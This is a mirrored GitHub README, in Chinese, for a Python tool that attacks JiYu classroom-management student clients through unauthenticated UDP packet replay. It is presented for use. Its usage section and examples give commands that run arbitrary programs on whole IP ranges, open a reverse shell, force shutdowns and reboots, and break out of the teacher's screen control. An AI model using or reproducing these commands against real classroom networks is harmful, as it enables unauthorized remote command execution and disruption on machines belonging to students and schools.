Giter Site home page Giter Site logo

jiyu_udp_attack's Introduction

极域电子教室数据包(udp)重放攻击脚本

  • 因为极域的学生端没有对接收到的udp包做(=・ω・=)身份验证,导致了我们可以构造特定的数据包让学生端来执行,从而实现命令执行攻击机房内上线的任意学生端机器。

运行环境

  • Python3

版本说明

v1.3

  • 脱离/恢复屏幕控制
  • 支持反弹shell

v1.2

  • 修复bug

v1.1

  • -g 选项支持获取学生端监听的端口

v1.0

  • 首次提交

使用方法:

    Usage: Jiyu_udp_attack.py -ip ip_address -p port -msg/-c/-r/-s xxx

        -ip   ip addres IP地址                 example:   -ip   192.168.80.23
                                                                192.168.80.122/24
        -p    port, default = 4705 端口,默认为4705

        -msg  send message 发送消息                        -msg  HelloWord!

        -c    command 命令                                 -c   "cmd.exe /c ipconfig" 
                                                                calc.exe
        -r    reboot 重启

        -s    shutdown 关机

        -l    loop * times, default = 1 循环次数,默认为1

        -t    loop interval, default = 22 s 循环时间间隔,默认是22秒


        -------------------- Extra Options --------------------
        
        -nc   反弹shell,使用命令exit退出
        
        -g    single options, Gets the current Intranet IP and student 
              client possible ports. 
              独立选项,获取当前的ip地址以及学生端监听的端口。
              If choose this options, other are become invalid. 
              如果选择了这个选项,其他选项将会失效。
         
        -break     独立选项,脱离屏幕控制,需要管理员权限

        -continue  独立选项,恢复屏幕控制

使用例子

1.获取内网ip地址及监听的端口

python Jiyu_udp_attack.py -g

2.脱离屏幕控制

当前运行权限需为管理员权限,主要用于开启MpsSvc服务

python Jiyu_udp_attack.py -break

3.恢复屏幕控制

python Jiyu_udp_attack.py -continue

4.发送消息

向IP地址为192.168.80.12的机器发送一条内容为"hello,baby!"的消息

python Jiyu_udp_attack.py -ip 192.168.80.12 -p -msg "hello,baby!"

5.执行命令

给192.168.80.12到192.168.80.137弹一个计算器

python Jiyu_udp_attack.py -ip 192.168.80.12-137 -p -c calc.exe

6.反弹shell

反弹shell时,IP只能为某个机器IP,不能批量反弹,而且机器需要出网 因为已经实现批量的任意命令执行,考虑到批量反弹也没啥意义,遂不添加

python Jiyu_udp_attack.py -ip 192.168.80.12 -p -nc

7.关机重启

关机

python Jiyu_udp_attack.py -ip 192.168.80.12 -p -s

重启

python Jiyu_udp_attack.py -ip 192.168.80.12 -p -r

8.循环

利用循环持续发送消息
1-254的机器会收到一条"hello,baby!"的消息,50s后会继续执行,共执行3次

    python Jiyu_udp_attack.py -ip 192.168.80.23/24 -p -msg "hello,baby!" -l 3 -t 50

jiyu_udp_attack's People

Contributors

ht0ruial avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.